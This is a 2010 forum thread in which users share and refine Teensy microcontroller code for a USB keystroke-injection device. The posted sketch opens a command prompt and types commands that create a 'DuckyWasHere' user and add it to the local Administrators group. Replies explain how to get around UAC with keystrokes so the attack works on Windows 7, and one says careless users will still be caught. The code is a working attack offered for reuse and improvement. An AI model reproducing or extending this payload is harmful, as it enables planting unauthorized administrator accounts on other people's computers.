Elementix Posted May 7, 2010 Share Posted May 7, 2010 Here's another version of w02057's Ducky Script. I'm still learning this whole coding thing, so bear with me. I'm not sure what his code was written in (C??) so I just remade it. There's still no minimizing of the command prompt, but the window doesn't stay open for very long anyway. Feel free to contribute. Credit goes to w02057 tho. :) Oh, and can someone tell me what kind of code is below?? // DUCKY_WAS_HERE - Teensy // Based on w02057's Ducky script (Pretty much the exact same thing) - 5/7/2010 - 3:30PM int ledPin = 11; void setup() { pinMode(ledPin, OUTPUT); // put this before other led commands or the LED will be dim ledstart(); // lights up when connected delay(3000); // delay for computer ledstart(); // lights up when payload starts Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.send_now(); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_key2(0); Keyboard.send_now(); d(); // this is a 100ms delay, see below for commands. Keyboard.print("cmd"); // Opens cmd prompt d(); enter(); delay(1000); // delay for prompt to load Keyboard.print("net user DuckyWasHere quackquack /add"); //First command (Username/Password) Keyboard.send_now(); enter(); d(); Keyboard.print("net localgroup Administrators DuckyWasHere /add"); //Second command Keyboard.send_now(); enter(); d(); Keyboard.print("exit"); //Exit cmd Keyboard.send_now(); enter(); d(); } void loop() { // Maybe a flashing LED? } void enter() { Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void sendClearKeys() { Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } // LED command for end of script. void ledend(){ Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.set_modifier(0); Keyboard.send_now(); digitalWrite(ledPin, HIGH); delay (500); digitalWrite(ledPin, LOW); delay (500); digitalWrite(ledPin, HIGH); delay (500); digitalWrite(ledPin, LOW); } // LED command for start of script void ledstart(){ digitalWrite(ledPin, HIGH); delay (1000); digitalWrite(ledPin, LOW); } // delay 100ms void d(){ delay(100); } Quote Link to comment Share on other sites More sharing options...
benownzu93 Posted May 7, 2010 Share Posted May 7, 2010 This should work for XP, but on 7 it won't you need to run cmd as admin for these commands to work. not too sure about vista but i have a feeling it is the same as 7 with this. Quote Link to comment Share on other sites More sharing options...
Elementix Posted May 7, 2010 Author Share Posted May 7, 2010 hmm...didn't think about that... I'm testing on an admin account on 7 so that must be why it works for me. Like I said tho, if you know a way to fix it, feel free to add to it.... Quote Link to comment Share on other sites More sharing options...
Iain Posted May 7, 2010 Share Posted May 7, 2010 This should work for XP, but on 7 it won't you need to run cmd as admin for these commands to work. not too sure about vista but i have a feeling it is the same as 7 with this. Are you sure that it will work on XP? I've just tried the raw commands and it failed. It's not possible for a Limited user to create a user account via net user ... then add it to the local admins group. If it was possible, it would be a huge security hole. This brings up something about the Ducky which has been perplexing me. I use my laptop whilst logged on as a Limited user. I rarely log on with Admin rights, preferring to use runas /user:..... I guess that all the code that would do anything "interesting" would have to be run whilst the user is logged on with Admin rights (unless something from Metasploit was included in the code). As far as I am aware, the Ducky is simply typing very quickly so, if I couldn't do something nefarious whilst sat at the user's keyboard, why would a Ducky? Bottom line: I suspect that the hope is that an unsuspecting victim is logged on with Admin rights if the Ducky is going to do it's "stuff"? Quote Link to comment Share on other sites More sharing options...
benownzu93 Posted May 7, 2010 Share Posted May 7, 2010 if you know a way to fix it, feel free to add to it.... The best way to do it is to find cmd in the start menu then use ctrl+shift and enter to run as admin, you also need to send left and enter to accept the UAC, I did something like this here Are you sure that it will work on XP? I've just tried the raw commands and it failed. It's not possible for a Limited user to create a user account via net user Very good point. I use my laptop whilst logged on as a Limited user. I rarely log on with Admin rights, preferring to use runas /user:..... You are smart, but dumb users aren't that smart. so it will still work for most common users. Quote Link to comment Share on other sites More sharing options...
Sl45h3R Posted May 8, 2010 Share Posted May 8, 2010 Control Shift doesn't work for me on 7. Quote Link to comment Share on other sites More sharing options...
Seshan Posted May 8, 2010 Share Posted May 8, 2010 Looks more like my code then w02057's ;) Quote Link to comment Share on other sites More sharing options...
Elementix Posted May 8, 2010 Author Share Posted May 8, 2010 lol, well...sorry about that. Maybe he modeled his from yours first. Credit to you as well then! :) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.